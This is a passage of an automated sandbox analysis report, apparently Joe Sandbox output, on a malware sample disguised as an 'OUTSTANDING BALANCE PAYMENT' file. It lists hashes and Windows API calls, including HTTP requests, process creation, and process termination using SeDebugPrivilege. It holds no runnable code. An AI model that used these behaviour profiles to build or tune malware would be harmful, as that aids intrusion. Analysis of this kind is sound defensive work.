                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
                                                          • Instruction ID: 5e52efd52228f610f747bd1ad5862f1eb983a8446f0e7985ce68117fbd48f74a
                                                          • Opcode Fuzzy Hash: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
                                                          • Instruction Fuzzy Hash: 9171A130400209DFCF219F64CC81AAABBF5FF59354F1482AEFDA96A2A5E7318841DB50
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                            • Part of subcall function 00B7B63C: GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                            • Part of subcall function 00B7B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                            • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                            • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00BCED3C
                                                          • ImageList_EndDrag.COMCTL32 ref: 00BCED42
                                                          • ReleaseCapture.USER32 ref: 00BCED48
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00BCEDF0
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BCEE03
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00BCEEDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 01f5c9bc83c00699e55fcd76181b5d9d89775bdf06c3e366cecd7d3376431944
                                                          • Instruction ID: c3a3c076c6a8d6f2c2756daf2adb8daeb377aa539de1a1dc9af8ba6ccc35f195
                                                          • Opcode Fuzzy Hash: 01f5c9bc83c00699e55fcd76181b5d9d89775bdf06c3e366cecd7d3376431944
                                                          • Instruction Fuzzy Hash: A2519A70204304AFD714DF24DC96FAE77E5EB98704F04496DF9A5972E2DB70A904CB52
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB45FF
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BB462B
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BB466D
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BB4682
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB468F
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BB46BF
                                                          • InternetCloseHandle.WININET(00000000), ref: 00BB4706
                                                            • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 1241431887-3916222277
                                                          • Opcode ID: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
                                                          • Instruction ID: 96f9dceabd56fb59b191079dae11f666050e684a5607a315e583942d4da97dc6
                                                          • Opcode Fuzzy Hash: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
                                                          • Instruction Fuzzy Hash: 1E414BB1501619BFEB129F54CC89FFA77ECFB09354F004196FA069A152DBF09D448BA4
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BFDC00), ref: 00BBB715
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BFDC00), ref: 00BBB749
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BBB8C1
                                                          • SysFreeString.OLEAUT32(?), ref: 00BBB8EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
                                                          • Instruction ID: df0e7e441143529af787d00e66dc52526e84daddad735b46c9e2afac1b15f4d7
                                                          • Opcode Fuzzy Hash: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
                                                          • Instruction Fuzzy Hash: 3EF10775A00209AFCB14DF94C888EFEB7B9FF49315F108499F945AB250DBB1AE45CB90
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BC24F5
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC2688
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26AC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26EC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC270E
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BC286F
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BC28A1
                                                          • CloseHandle.KERNEL32(?), ref: 00BC28D0
                                                          • CloseHandle.KERNEL32(?), ref: 00BC2947
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 73c0d7a67d8dc0bb5d6962b1b54aaca8465b11bf7807a2ce034a4e9f13d629ce
                                                          • Instruction ID: b9bb50e601734a72a47281c8118ae45c613c333539d84cf9194c45e12121a9f3
                                                          • Opcode Fuzzy Hash: 73c0d7a67d8dc0bb5d6962b1b54aaca8465b11bf7807a2ce034a4e9f13d629ce
                                                          • Instruction Fuzzy Hash: 82D18B35604201DFCB14EF24C891F6ABBE5EF85310F1488ADF8999B2A2DB31EC45CB52
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BCB3F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
                                                          • Instruction ID: d74418dad0edfdb77848066ef1cbdb60bdf87dd8619288439b98d3750b6e473b
                                                          • Opcode Fuzzy Hash: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
                                                          • Instruction Fuzzy Hash: DC519E30600254BFEF249F28CCD6FAD3BE4EB45314F24419AFA25E62E2DB71E9448B55
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BDDB1B
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDDB3C
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BDDB51
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BDDB6E
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BDDB95
                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBA0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BDDBBD
                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                          • String ID:
                                                          • API String ID: 1268354404-0
                                                          • Opcode ID: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
                                                          • Instruction ID: 9c7c14d8381435d000bbde879c476354dffe71c28493020ea243f0a1ccf8b5fc
                                                          • Opcode Fuzzy Hash: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
                                                          • Instruction Fuzzy Hash: 6B515A70600209EFDB24DF64CC81FAE77F4EB58754F104559F95A9B690EBB0AD80DB50
                                                          APIs
                                                            • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                            • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
                                                            • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00BA75CA
                                                          • _wcscmp.LIBCMT ref: 00BA75E2
                                                          • MoveFileW.KERNEL32(?,?), ref: 00BA75FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
                                                          • Instruction ID: c382c91ef2c88e6df8ea8aa7ad1795dde7b57253a329b4a264168bcd101e43c5
                                                          • Opcode Fuzzy Hash: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
                                                          • Instruction Fuzzy Hash: 14511CB2A4D2199ADF50EB94DC819DE73FCEF09310B1044EAFA05A3151EA7496C9CF60
                                                          APIs
                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EAEB
                                                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EB32
                                                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDC86
                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDCF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
                                                          • Instruction ID: 8e686c18366bb7480da78cefc2552b2358c29b5f16daa7e97c6b134c4fb3a0b4
                                                          • Opcode Fuzzy Hash: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
                                                          • Instruction Fuzzy Hash: F741E7702146809AD73547288DCDB2ABED5EF59304F1D88CEF0BF86B61D6B1F880C611
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B26C
                                                          • HeapAlloc.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B273
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B288
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B290
                                                          • DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B293
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B2A3
                                                          • GetCurrentProcess.KERNEL32(00B9AEF1,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AB
                                                          • DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AE
                                                          • CreateThread.KERNEL32(00000000,00000000,00B9B2D4,00000000,00000000,00000000), ref: 00B9B2C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
                                                          • Instruction ID: e223da09781a18ea3904e7932b6a8aa426c268cfeca2bbc4a175a2c0c09b0ecc
                                                          • Opcode Fuzzy Hash: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
                                                          • Instruction Fuzzy Hash: 9B01BBB5240344BFE710ABA5DD89F6B7BACEB88711F018411FA15DF1A1CAB59800CB65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
                                                          • Instruction ID: b3e71f9d61477a6aefe21c7ac99c1fd5cc19ccbff9bc3ca798818acb5a33aa18
                                                          • Opcode Fuzzy Hash: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
                                                          • Instruction Fuzzy Hash: C5E19071A00219AFDF14DFA8D885AFE7BF5EF58314F1480A9F915AB281D7B0AD41CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
                                                          • Instruction ID: 9761e5cd01af3c1ffb6e9a4e272615de6936721d789915b6069c1f4f837265e2
                                                          • Opcode Fuzzy Hash: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
                                                          • Instruction Fuzzy Hash: 44919171A00215ABDF24CF95C884FEEBBF8EF45710F1085A9F515AB290DBF49945CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memset
                                                          • String ID: Q\E$[$\$\$]$^
                                                          • API String ID: 2102423945-1026548749
                                                          • Opcode ID: bdcada4ed3b5c8e248e620d46321691426ac6ad3dc12f98b65c2dadf7efc514d
                                                          • Instruction ID: 88eaf3b7b188bb6f99338975ae754e7b8fd601fcc7fef784033c245dfb602f49
                                                          • Opcode Fuzzy Hash: bdcada4ed3b5c8e248e620d46321691426ac6ad3dc12f98b65c2dadf7efc514d
                                                          • Instruction Fuzzy Hash: 59517E71D042499BDF24CF98C8816BDF7F6EF98318F2482AAD819A7351E7349D85CB81
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BC9B19
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BC9B2D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BC9B47
                                                          • _wcscat.LIBCMT ref: 00BC9BA2
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BC9BB9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BC9BE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
                                                          • Instruction ID: 782c34f17722b34972d95cb37ede5d870111b6eee818baf1f546256f7a2ec3d3
                                                          • Opcode Fuzzy Hash: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
                                                          • Instruction Fuzzy Hash: 12419071900348AFEB219FA4DC89FEE77E8EF08350F1045AAF549A7291D6B19D84CB60
                                                          APIs
                                                            • Part of subcall function 00BA6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
                                                            • Part of subcall function 00BA6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
                                                            • Part of subcall function 00BA6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC179A
                                                          • GetLastError.KERNEL32 ref: 00BC17AD
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC17D9
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BC1855
                                                          • GetLastError.KERNEL32(00000000), ref: 00BC1860
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BC1895
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
